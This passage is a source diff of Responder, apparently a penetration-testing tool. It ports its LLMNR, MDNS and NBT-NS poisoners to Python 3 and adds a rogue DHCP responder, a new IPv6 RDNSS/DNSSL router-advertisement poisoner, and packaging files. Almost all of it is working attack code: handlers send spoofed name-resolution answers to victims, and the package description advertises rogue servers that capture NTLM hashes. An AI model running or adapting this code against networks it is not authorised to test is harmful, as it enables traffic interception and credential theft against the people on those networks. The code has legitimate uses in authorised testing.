+        Packet.calculate(DHCP_DNS)
+        Buffer = UDP(Data = Packet)
+        Buffer.calculate()
+        SendDHCP(str(IP_Header)+str(Buffer), (CurrentIP, 68))
+        DHCPClient.append(MacAddrStr)
+        SaveDHCPToDb({
+                      'MAC': MacAddrStr, 
+                      'IP': CurrentIP, 
+                      'RequestedIP': RequestedIP,
+                      })
+        return 'Acknowledged DHCP Inform for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, RequestedIP, MacAddrStr)
+
+    elif OpCode == b"\x01" and Respond_To_Requests:  # DHCP Discover
+        IP = FindIP(data)
+        if IP:
+            IPConv = socket.inet_ntoa(IP)
+            if RespondToThisIP(IPConv):
+                IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1'))
+                Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), DHCPOpCode="\x02", ElapsedSec=Seconds.decode('latin-1'))
+                Packet.calculate(DHCP_DNS)
+                Buffer = UDP(Data = Packet)
+                Buffer.calculate()
+                SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0))
+                DHCPClient.append(MacAddrStr)
+                SaveDHCPToDb({
+                              'MAC': MacAddrStr, 
+                              'IP': CurrentIP, 
+                              'RequestedIP': IPConv,
+                             })
+                return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, IPConv, MacAddrStr)
+
+def SendDiscover():
+	s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
+	s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
+	IP_Header = IPHead(SrcIP = socket.inet_aton('0.0.0.0').decode('latin-1'), DstIP=socket.inet_aton('255.255.255.255').decode('latin-1'))
+	Packet = DHCPDiscover()
+	Packet.calculate()
+	Buffer = UDP(SrcPort="\x00\x44", DstPort="\x00\x43",Data = Packet)
+	Buffer.calculate()
+	s.sendto(NetworkSendBufferPython2or3(str(IP_Header)+str(Buffer)), ('255.255.255.255', 67))
+
+def SendDHCP(packet,Host):
+	s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
+	s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
+	s.sendto(NetworkSendBufferPython2or3(packet), Host)
+
+def DHCP(DHCP_DNS):
+    s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
+    s.bind((Interface, 0x0800))
+    SendDiscover()
+    while True:
+            data = s.recvfrom(65535)
+            if data[0][23:24] == b"\x11":# is udp?
+                SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data)
+                if SrcPort == 67 or DstPort == 67:
+                    ClientIP = socket.inet_ntoa(data[0][26:30])
+                    ret = ParseDHCPCode(data[0][42:], ClientIP,DHCP_DNS)
+                    if ret and not settings.Config.Quiet_Mode:
+                        print(text("[*] [DHCP] %s" % ret))

poisoners/LLMNR.py

@@ -14,32 +14,40 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import struct
-import fingerprint
-
-from packets import LLMNR_Ans
-from SocketServer import BaseRequestHandler
+from packets import LLMNR_Ans, LLMNR6_Ans
 from utils import *
 
+if (sys.version_info > (3, 0)):
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
+#Should we answer to those AAAA?
+Have_IPv6 = settings.Config.IPv6
 
 def Parse_LLMNR_Name(data):
-	NameLen = struct.unpack('>B',data[12])[0]
-	return data[13:13+NameLen]
-
+	import codecs
+	NameLen = data[12]
+	if (sys.version_info > (3, 0)):
+		return data[13:13+NameLen]
+	else:
+		NameLen2 = int(codecs.encode(NameLen, 'hex'), 16)
+		return data[13:13+int(NameLen2)]
 
 def IsICMPRedirectPlausible(IP):
 	dnsip = []
-	for line in file('/etc/resolv.conf', 'r'):
-		ip = line.split()
-		if len(ip) < 2:
-		   continue
-		elif ip[0] == 'nameserver':
-			dnsip.extend(ip[1:])
-	for x in dnsip:
-		if x != "127.0.0.1" and IsOnTheSameSubnet(x,IP) is False:
-			print color("[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5)
-			print color("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5)
-			print color("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5)
+	with open('/etc/resolv.conf', 'r') as file:
+		for line in file:
+			ip = line.split()
+			if len(ip) < 2:
+				continue
+			elif ip[0] == 'nameserver':
+				dnsip.extend(ip[1:])
+		for x in dnsip:
+			if x != "127.0.0.1" and IsIPv6IP(x) is False and IsOnTheSameSubnet(x,IP) is False:	#Temp fix to ignore IPv6 DNS addresses
+				print(color("[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5))
+				print(color("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5))
+				print(color("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5))
 
 if settings.Config.AnalyzeMode:
 	IsICMPRedirectPlausible(settings.Config.Bind_To)
@@ -47,28 +55,73 @@ if settings.Config.AnalyzeMode:
 
 class LLMNR(BaseRequestHandler):  # LLMNR Server class
 	def handle(self):
-		data, soc = self.request
-		Name = Parse_LLMNR_Name(data)
+		try:
+			data, soc = self.request
+			Name = Parse_LLMNR_Name(data).decode("latin-1")
+			if settings.Config.AnswerName is None:
+				AnswerName = Name
+			else:
+				AnswerName = settings.Config.AnswerName
+			LLMNRType = Parse_IPV6_Addr(data)
 
-		# Break out if we don't want to respond to this host
-		if RespondToThisHost(self.client_address[0], Name) is not True:
-			return None
+			# Break out if we don't want to respond to this host
+			if RespondToThisHost(self.client_address[0].replace("::ffff:",""), Name) is not True:
+				return None
+			#IPv4
+			if data[2:4] == b'\x00\x00' and LLMNRType:
+				if settings.Config.AnalyzeMode:
+					LineHeader = "[Analyze mode: LLMNR]"
+					# Don't print if in Quiet Mode
+					if not settings.Config.Quiet_Mode:
+						print(color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
+					SavePoisonersToDb({
+							'Poisoner': 'LLMNR', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Name,
+							'AnalyzeMode': '1',
+							})
 
-		if data[2:4] == "\x00\x00" and Parse_IPV6_Addr(data):
-			Finger = None
-			if settings.Config.Finger_On_Off:
-				Finger = fingerprint.RunSmbFinger((self.client_address[0], 445))
+				elif LLMNRType == True:  # Poisoning Mode
+					#Default:
+					if settings.Config.TTL == None:
+						Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName)
+					else:
+						Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName, TTL=settings.Config.TTL)
+					Buffer1.calculate()
+					soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
+					if not settings.Config.Quiet_Mode:
+						LineHeader = "[*] [LLMNR]"
+						if settings.Config.AnswerName is None:
+							print(color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
+						else:
+							print(color("%s  Poisoned answer sent to %s for name %s (spoofed answer name %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, AnswerName), 2, 1))
+					SavePoisonersToDb({
+							'Poisoner': 'LLMNR', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Name,
+							'AnalyzeMode': '0',
+							})
 
-			if settings.Config.AnalyzeMode:
-				LineHeader = "[Analyze mode: LLMNR]"
-				print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)
-			else:  # Poisoning Mode
-				Buffer = LLMNR_Ans(Tid=data[0:2], QuestionName=Name, AnswerName=Name)
-				Buffer.calculate()
-				soc.sendto(str(Buffer), self.client_address)
-				LineHeader = "[*] [LLMNR]"
-				print color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0], Name), 2, 1)
+				elif LLMNRType == 'IPv6' and Have_IPv6:
+					#Default:
+					if settings.Config.TTL == None:
+						Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName)
+					else:
+						Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName, TTL=settings.Config.TTL)
+					Buffer1.calculate()
+					soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
+					if not settings.Config.Quiet_Mode:
+						LineHeader = "[*] [LLMNR]"
+						if settings.Config.AnswerName is None:
+							print(color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
+						else:
+							print(color("%s  Poisoned answer sent to %s for name %s (spoofed answer name %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, AnswerName), 2, 1))
+					SavePoisonersToDb({
+							'Poisoner': 'LLMNR6', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Name,
+							'AnalyzeMode': '0',
+							})
 
-			if Finger is not None:
-				print text("[FINGER] OS Version     : %s" % color(Finger[0], 3))
-				print text("[FINGER] Client Version : %s" % color(Finger[1], 3))
+		except:
+			pass

poisoners/MDNS.py

@@ -15,49 +15,98 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import struct
-
-from SocketServer import BaseRequestHandler
-from packets import MDNS_Ans
+import sys
+if (sys.version_info > (3, 0)):
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+from packets import MDNS_Ans, MDNS6_Ans
 from utils import *
 
+#Should we answer to those AAAA?
+Have_IPv6 = settings.Config.IPv6
+
 def Parse_MDNS_Name(data):
 	try:
-		data = data[12:]
-		NameLen = struct.unpack('>B',data[0])[0]
-		Name = data[1:1+NameLen]
-		NameLen_ = struct.unpack('>B',data[1+NameLen])[0]
-		Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
-		return Name+'.'+Name_
+		if (sys.version_info > (3, 0)):
+			data = data[12:]
+			NameLen = data[0]
+			Name = data[1:1+NameLen]
+			NameLen_ = data[1+NameLen]
+			Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
+			FinalName = Name+b'.'+Name_
+			return FinalName.decode("latin-1").replace("\x05","")
+		else:
+			data = NetworkRecvBufferPython2or3(data[12:])
+			NameLen = struct.unpack('>B',data[0])[0]
+			Name = data[1:1+NameLen]
+			NameLen_ = struct.unpack('>B',data[1+NameLen])[0]
+			Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
+			return Name+'.'+Name_.replace("\x05","")
+
 	except IndexError:
 		return None
 
 
 def Poisoned_MDNS_Name(data):
-	data = data[12:]
+	data = NetworkRecvBufferPython2or3(data[12:])
 	return data[:len(data)-5]
 
-
 class MDNS(BaseRequestHandler):
 	def handle(self):
-		MADDR = "224.0.0.251"
-		MPORT = 5353
-
-		data, soc = self.request
-		Request_Name = Parse_MDNS_Name(data)
-
-		# Break out if we don't want to respond to this host
-		if (not Request_Name) or (RespondToThisHost(self.client_address[0], Request_Name) is not True):
-			return None
-
-		if settings.Config.AnalyzeMode:  # Analyze Mode
-			if Parse_IPV6_Addr(data):
-				print text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0], 3), color(Request_Name, 3)))
-		else:  # Poisoning Mode
-			if Parse_IPV6_Addr(data):
+		try:
+			data, soc = self.request
+			Request_Name = Parse_MDNS_Name(data)
+			MDNSType = Parse_IPV6_Addr(data)
+			# Break out if we don't want to respond to this host
+		
+			if (not Request_Name) or (RespondToThisHost(self.client_address[0].replace("::ffff:",""), Request_Name) is not True):
+				return None
 
+			if settings.Config.AnalyzeMode:  # Analyze Mode
+				# Don't print if in Quiet Mode
+				if not settings.Config.Quiet_Mode:
+					print(text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0].replace("::ffff:",""), 3), color(Request_Name, 3))))
+				SavePoisonersToDb({
+						'Poisoner': 'MDNS', 
+						'SentToIp': self.client_address[0], 
+						'ForName': Request_Name,
+						'AnalyzeMode': '1',
+						})
+			elif MDNSType == True:  # Poisoning Mode
 				Poisoned_Name = Poisoned_MDNS_Name(data)
-				Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=socket.inet_aton(settings.Config.Bind_To))
+				#Use default:
+				if settings.Config.TTL == None:
+					Buffer = MDNS_Ans(AnswerName = Poisoned_Name)
+				else:
+					Buffer = MDNS_Ans(AnswerName = Poisoned_Name, TTL=settings.Config.TTL)
 				Buffer.calculate()
-				soc.sendto(str(Buffer), (MADDR, MPORT))
+				soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
+				if not settings.Config.Quiet_Mode:
+					print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0].replace("::ffff:",""), Request_Name), 2, 1))
+				SavePoisonersToDb({
+						'Poisoner': 'MDNS', 
+						'SentToIp': self.client_address[0], 
+						'ForName': Request_Name,
+						'AnalyzeMode': '0',
+						})
 
-				print color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0], Request_Name), 2, 1)
+			elif MDNSType == 'IPv6' and Have_IPv6:  # Poisoning Mode
+				Poisoned_Name = Poisoned_MDNS_Name(data)
+				#Use default:
+				if settings.Config.TTL == None:
+					Buffer = MDNS6_Ans(AnswerName = Poisoned_Name)
+				else:
+					Buffer = MDNS6_Ans(AnswerName = Poisoned_Name, TTL= settings.Config.TTL)
+				Buffer.calculate()
+				soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
+				if not settings.Config.Quiet_Mode:
+					print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0].replace("::ffff:",""), Request_Name), 2, 1))
+				SavePoisonersToDb({
+						'Poisoner': 'MDNS6', 
+						'SentToIp': self.client_address[0], 
+						'ForName': Request_Name,
+						'AnalyzeMode': '0',
+						})
+		except:
+			raise

poisoners/NBTNS.py

@@ -14,54 +14,53 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import fingerprint
-
+import sys
 from packets import NBT_Ans
-from SocketServer import BaseRequestHandler
 from utils import *
 
-# Define what are we answering to.
-def Validate_NBT_NS(data):
-	if settings.Config.AnalyzeMode:
-		return False
-	elif NBT_NS_Role(data[43:46]) == "File Server":
-		return True
-	elif settings.Config.NBTNSDomain:
-		if NBT_NS_Role(data[43:46]) == "Domain Controller":
-			return True
-	elif settings.Config.Wredirect:
-		if NBT_NS_Role(data[43:46]) == "Workstation/Redirector":
-			return True
-	return False
+if (sys.version_info > (3, 0)):
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 
 # NBT_NS Server class.
 class NBTNS(BaseRequestHandler):
 
 	def handle(self):
+		try:
+			data, socket = self.request
+			Name = Decode_Name(NetworkRecvBufferPython2or3(data[13:45]))
+			# Break out if we don't want to respond to this host
+			if RespondToThisHost(self.client_address[0].replace("::ffff:",""), Name) is not True:
+				return None
 
-		data, socket = self.request
-		Name = Decode_Name(data[13:45])
+			if data[2:4] == b'\x01\x10':
+				if settings.Config.AnalyzeMode:  # Analyze Mode
+					# Don't print if in Quiet Mode
+					if not settings.Config.Quiet_Mode:
+						print(text('[Analyze mode: NBT-NS] Request by %-15s for %s, ignoring' % (color(self.client_address[0].replace("::ffff:",""), 3), color(Name, 3))))
+					SavePoisonersToDb({
+							'Poisoner': 'NBT-NS', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Name,
+							'AnalyzeMode': '1',
+							})
+				else:  # Poisoning Mode
+					if settings.Config.TTL == None:
+						Buffer1 = NBT_Ans()
+					else:
+						Buffer1 = NBT_Ans(TTL=settings.Config.TTL)
+					Buffer1.calculate(data)
+					socket.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
+					if not settings.Config.Quiet_Mode:
+						LineHeader = "[*] [NBT-NS]"
+						print(color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, NBT_NS_Role(NetworkRecvBufferPython2or3(data[43:46]))), 2, 1))
+					SavePoisonersToDb({
+							'Poisoner': 'NBT-NS', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Name,
+							'AnalyzeMode': '0',
+							})
+		except:
+			raise
 
-		# Break out if we don't want to respond to this host
-		if RespondToThisHost(self.client_address[0], Name) is not True:
-			return None
-
-		if data[2:4] == "\x01\x10":
-			Finger = None
-			if settings.Config.Finger_On_Off:
-				Finger = fingerprint.RunSmbFinger((self.client_address[0],445))
-
-			if settings.Config.AnalyzeMode:  # Analyze Mode
-				LineHeader = "[Analyze mode: NBT-NS]"
-				print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)
-			else:  # Poisoning Mode
-				Buffer = NBT_Ans()
-				Buffer.calculate(data)
-				socket.sendto(str(Buffer), self.client_address)
-				LineHeader = "[*] [NBT-NS]"
-
-				print color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0], Name, NBT_NS_Role(data[43:46])), 2, 1)
-
-			if Finger is not None:
-				print text("[FINGER] OS Version     : %s" % color(Finger[0], 3))
-				print text("[FINGER] Client Version : %s" % color(Finger[1], 3))

poisoners/RDNSS.py

@@ -0,0 +1,357 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+"""
+RDNSS/DNSSL Poisoner - DNS Router Advertisement Options (RFC 8106)
+
+Sends IPv6 Router Advertisements with:
+- RDNSS (Recursive DNS Server) option - advertises Responder as DNS server
+- DNSSL (DNS Search List) option - injects DNS search suffix
+
+Both options are independent and can be used separately or together.
+
+This causes IPv6-enabled clients to:
+- Use Responder's DNS server for name resolution (RDNSS)
+- Append search suffix to unqualified names (DNSSL)
+
+Usage:
+    python Responder.py -I eth0 --rdnss -v              # RDNSS only
+    python Responder.py -I eth0 --dnssl corp.local -v   # DNSSL only
+    python Responder.py -I eth0 --rdnss --dnssl corp.local -v  # Both
+"""
+
+import socket
+import struct
+import random
+import time
+import signal
+from utils import *
+
+# ICMPv6 Constants
+ICMPV6_ROUTER_ADVERTISEMENT = 134
+ICMPV6_HOP_LIMIT = 255
+
+# DNS RA Option Types (RFC 8106)
+ND_OPT_RDNSS = 25  # Recursive DNS Server
+ND_OPT_DNSSL = 31  # DNS Search List
+
+# IPv6 All-Nodes Multicast Address
+IPV6_ALL_NODES = "ff02::1"
+
+# RA Timing (seconds)
+RA_INTERVAL_MIN = 30
+RA_INTERVAL_MAX = 120
+RA_LIFETIME = 1800  # 30 minutes
+
+
+class RDNSSOption:
+    """Recursive DNS Server Option (Type 25)"""
+    
+    def __init__(self, dns_servers, lifetime=RA_LIFETIME):
+        self.dns_servers = dns_servers if isinstance(dns_servers, list) else [dns_servers]
+        self.lifetime = lifetime
+    
+    def build(self):
+        if not self.dns_servers:
+            return b''
+        
+        addresses = b''
+        for server in self.dns_servers:
+            addresses += socket.inet_pton(socket.AF_INET6, server)
+        
+        # Length in units of 8 octets: 1 (header) + 2 * num_addresses
+        length = 1 + (2 * len(self.dns_servers))
+        
+        header = struct.pack(
+            '!BBHI',
+            ND_OPT_RDNSS,
+            length,
+            0,              # Reserved
+            self.lifetime
+        )
+        
+        return header + addresses
+
+
+class DNSSLOption:
+    """DNS Search List Option (Type 31)"""
+    
+    def __init__(self, domains, lifetime=RA_LIFETIME):
+        self.domains = domains if isinstance(domains, list) else [domains]
+        self.lifetime = lifetime
+    
+    @staticmethod
+    def encode_domain(domain):
+        """Encode domain name in DNS wire format (RFC 1035)."""
+        encoded = b''
+        for label in domain.rstrip('.').split('.'):
+            label_bytes = label.encode('ascii')
+            encoded += bytes([len(label_bytes)]) + label_bytes
+        encoded += b'\x00'  # Root label
+        return encoded
+    
+    def build(self):
+        if not self.domains:
+            return b''
+        
+        domain_data = b''
+        for domain in self.domains:
+            domain_data += self.encode_domain(domain)
+        
+        # Pad to 8-octet boundary
+        header_size = 8
+        total_size = header_size + len(domain_data)
+        padding_needed = (8 - (total_size % 8)) % 8
+        domain_data += b'\x00' * padding_needed
+        
+        length = (header_size + len(domain_data)) // 8
+        
+        header = struct.pack(
+            '!BBHI',
+            ND_OPT_DNSSL,
+            length,
+            0,              # Reserved
+            self.lifetime
+        )
+        
+        return header + domain_data
+
+
+class RouterAdvertisement:
+    """ICMPv6 Router Advertisement Message"""
+    
+    def __init__(self, rdnss=None, dnssl=None, managed=False, other=False, router_lifetime=0):
+        self.cur_hop_limit = 64
+        self.managed_flag = managed
+        self.other_flag = other
+        self.router_lifetime = router_lifetime  # 0 = not a default router
+        self.reachable_time = 0
+        self.retrans_timer = 0
+        self.rdnss = rdnss
+        self.dnssl = dnssl
+    
+    def build(self):
+        flags = 0
+        if self.managed_flag:
+            flags |= 0x80
+        if self.other_flag:
+            flags |= 0x40
+        
+        ra_header = struct.pack(
+            '!BBHBBHII',
+            ICMPV6_ROUTER_ADVERTISEMENT,
+            0,                          # Code
+            0,                          # Checksum (placeholder)
+            self.cur_hop_limit,
+            flags,
+            self.router_lifetime,
+            self.reachable_time,
+            self.retrans_timer
+        )
+        
+        options = b''
+        if self.rdnss:
+            options += self.rdnss.build()
+        if self.dnssl:
+            options += self.dnssl.build()
+        
+        return ra_header + options
+
+
+def compute_icmpv6_checksum(source, dest, icmpv6_packet):
+    """Compute ICMPv6 checksum including pseudo-header."""
+    src_addr = socket.inet_pton(socket.AF_INET6, source)
+    dst_addr = socket.inet_pton(socket.AF_INET6, dest)
+    
+    pseudo_header = struct.pack(
+        '!16s16sI3xB',
+        src_addr,
+        dst_addr,
+        len(icmpv6_packet),
+        58  # ICMPv6
+    )
+    
+    data = pseudo_header + icmpv6_packet
+    if len(data) % 2:
+        data += b'\x00'
+    
+    checksum = 0
+    for i in range(0, len(data), 2):
+        word = (data[i] << 8) + data[i + 1]
+        checksum += word
+    
+    while checksum >> 16:
+        checksum = (checksum & 0xFFFF) + (checksum >> 16)
+    
+    return ~checksum & 0xFFFF
+
+
+def get_link_local_address(interface):
+    """Get link-local IPv6 address for interface (required for RA source)."""
+    try:
+        with open('/proc/net/if_inet6', 'r') as f:
+            for line in f:
+                parts = line.split()
+                if len(parts) >= 6 and parts[5] == interface:
+                    addr = parts[0]
+                    formatted = ':'.join(addr[i:i+4] for i in range(0, 32, 4))
+                    if formatted.lower().startswith('fe80'):
+                        return formatted
+    except FileNotFoundError:
+        pass
+    
+    # Fallback: try netifaces
+    try:
+        import netifaces
+        addrs = netifaces.ifaddresses(interface)
+        if netifaces.AF_INET6 in addrs:
+            for addr in addrs[netifaces.AF_INET6]:
+                ipv6 = addr.get('addr', '').split('%')[0]
+                if ipv6.lower().startswith('fe80'):
+                    return ipv6
+    except:
+        pass
+    
+    return None
+
+
+def get_dns_server_address(interface):
+    """Get IPv6 address to advertise as DNS server. Uses Bind_To6 from settings."""
+    # Use Bind_To6 from settings (set via -6 option or config)
+    if hasattr(settings.Config, 'Bind_To6') and settings.Config.Bind_To6:
+        return settings.Config.Bind_To6
+    
+    # Fallback: auto-detect from interface
+    try:
+        import netifaces
+        addrs = netifaces.ifaddresses(interface)
+        if netifaces.AF_INET6 in addrs:
+            global_ipv6 = None
+            linklocal_ipv6 = None
+            
+            for addr in addrs[netifaces.AF_INET6]:
+                ipv6 = addr.get('addr', '').split('%')[0]
+                if not ipv6 or ipv6 == '::1':
+                    continue
+                
+                if ipv6.lower().startswith('fe80'):
+                    if not linklocal_ipv6:
+                        linklocal_ipv6 = ipv6
+                else:
+                    if not global_ipv6:
+                        global_ipv6 = ipv6
+            
+            # Prefer global, fall back to link-local
+            return global_ipv6 or linklocal_ipv6
+    except:
+        pass
+    
+    # Last resort: link-local
+    return get_link_local_address(interface)
+
+
+def send_ra(interface, source_ip, dns_server=None, dnssl_domains=None):
+    """Send a single Router Advertisement."""
+    try:
+        # Build RDNSS option if DNS server specified
+        rdnss = None
+        if dns_server:
+            rdnss = RDNSSOption(dns_servers=[dns_server], lifetime=RA_LIFETIME)
+        
+        # Build DNSSL option if domains specified
+        dnssl = None
+        if dnssl_domains:
+            dnssl = DNSSLOption(domains=dnssl_domains, lifetime=RA_LIFETIME)
+        
+        # Build RA packet
+        ra = RouterAdvertisement(rdnss=rdnss, dnssl=dnssl)
+        
+        # Create raw socket
+        sock = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6)
+        sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, interface.encode())
+        sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_HOPS, ICMPV6_HOP_LIMIT)
+        sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_UNICAST_HOPS, ICMPV6_HOP_LIMIT)
+        
+        # Build packet with checksum
+        packet = bytearray(ra.build())
+        checksum = compute_icmpv6_checksum(source_ip, IPV6_ALL_NODES, bytes(packet))
+        struct.pack_into('!H', packet, 2, checksum)
+        
+        # Send to all-nodes multicast
+        sock.sendto(bytes(packet), (IPV6_ALL_NODES, 0, 0, socket.if_nametoindex(interface)))
+        sock.close()
+        
+        return True
+        
+    except PermissionError:
+        print(color("[!] ", 1, 1) + "RDNSS: Root privileges required for raw sockets")
+        return False
+    except OSError as e:
+        if settings.Config.Verbose:
+            print(color("[!] ", 1, 1) + "RDNSS error: %s" % str(e))
+        return False
+
+
+def RDNSS(interface, rdnss_enabled, dnssl_domain):
+    """
+    RDNSS/DNSSL Poisoner - Main entry point
+    
+    Sends periodic Router Advertisements with DNS options:
+    - RDNSS: Advertises Responder as DNS server (--rdnss)
+    - DNSSL: Injects DNS search suffix (--dnssl)
+    
+    Both options are independent and can be used separately or together.
+    
+    Args:
+        interface: Network interface to send RAs on
+        rdnss_enabled: If True, include RDNSS option (DNS server)
+        dnssl_domain: If set, include DNSSL option (search suffix)
+    """
+    # Get source address (must be link-local for RAs per RFC 4861)
+    source_ip = get_link_local_address(interface)
+    if not source_ip:
+        print(color("[!] ", 1, 1) + "RDNSS: Could not get link-local address for %s" % interface)
+        return
+    
+    # Get DNS server address if RDNSS is enabled
+    dns_server = None
+    if rdnss_enabled:
+        dns_server = get_dns_server_address(interface)
+        if not dns_server:
+            print(color("[!] ", 1, 1) + "RDNSS: Could not determine IPv6 address for DNS server")
+            return
+    
+    # Format DNSSL domain
+    domains = None
+    if dnssl_domain:
+        domains = [dnssl_domain] if isinstance(dnssl_domain, str) else dnssl_domain
+    
+    # Startup messages
+    if dns_server:
+        print(color("[*] ", 2, 1) + "RDNSS advertising DNS server: %s" % dns_server)
+    if domains:
+        print(color("[*] ", 2, 1) + "DNSSL advertising search domain: %s" % ', '.join(domains))
+    print(color("[*] ", 2, 1) + "Sending RA every %d-%d seconds" % (RA_INTERVAL_MIN, RA_INTERVAL_MAX))
+    print(color("[*] ", 2, 1) + "Avoid self poisoning with: \"sudo ip6tables -A INPUT -p icmpv6 --icmpv6-type router-advertisement -j DROP\"")
+    
+    # Send initial RA
+    send_ra(interface, source_ip, dns_server, domains)
+    
+    # Main loop - send RAs at random intervals
+    while True:
+        interval = random.randint(RA_INTERVAL_MIN, RA_INTERVAL_MAX)
+        time.sleep(interval)
+        send_ra(interface, source_ip, dns_server, domains)

pyproject.toml

@@ -0,0 +1,30 @@
+[build-system]
+requires = ["pdm-backend >= 2.4.0"]
+build-backend = "pdm.backend"
+
+[project]
+name = "Responder-poisoner" # "responder" is already taken
+description = "LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication."
+readme = "README.md"
+license = "GPL-3.0-only"
+license-files = ["LICENSE"]
+dynamic = ["version"]
+dependencies = ["aioquic", "netifaces>=0.10.4"]
+classifiers = [
+    "Operating System :: MacOS",
+    "Operating System :: POSIX :: Linux",
+    "Topic :: Security"
+]
+
+[project.urls]
+Homepage = "https://github.com/lgandx/Responder"
+Issues = "https://github.com/lgandx/Responder/issues"
+
+[project.scripts]
+responder = "Responder:main"
+
+[tool.pdm.build]
+includes = ["*.py", "files/", "poisoners/", "servers/", "certs/", "tools/", "Responder.conf"]
+
+[tool.pdm.version]
+source = "scm"

requirements.txt

@@ -0,0 +1,2 @@
+aioquic
+netifaces>=0.10.4

servers/Browser.py

@@ -14,40 +14,43 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData
-from SocketServer import BaseRequestHandler
 from utils import *
+from packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 import struct
 
 
